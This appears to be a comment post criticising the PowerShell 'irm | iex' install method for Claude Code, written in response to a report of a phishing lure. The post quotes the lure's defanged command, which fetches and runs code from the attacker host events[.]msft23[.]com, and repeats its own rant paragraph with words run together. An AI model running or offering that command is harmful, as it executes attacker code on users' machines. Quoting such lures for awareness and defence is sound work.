While the canonical command is “irm https[:]//claude[.]ai/install.ps1 | iex”, the lure replaced the destination host with “irm events[.]msft23[.]com | iex”.
Whatever artificially intelligent person at Anthopic decided that the official install method for Claude Code should be an irm piped to an iex in PowerShelll should be dragged out behind the same woodshed as Old Yeller. That is basically screaming “malicious code” at security tools. And it’s training developers that blindly running code from the internet is a-ok. It’s no wonder I’ve already seen exactly this sort of thing (with a different URL) happen in my environment. It’s like the AI companies are trying to make security worse.
Jumping over to the original report:
Whatever artificially intelligent person at Anthopic decided that the official install method for Claude Code should be an
irmpiped to aniexin PowerShelll should be dragged out behind the same woodshed as Old Yeller. That is basically screaming “malicious code” at security tools. And it’s training developers that blindly running code from the internet is a-ok. It’s no wonder I’ve already seen exactly this sort of thing (with a different URL) happen in my environment. It’s like the AI companies are trying to make security worse.Claude Code is utter garbage. The VSC extension is okay tho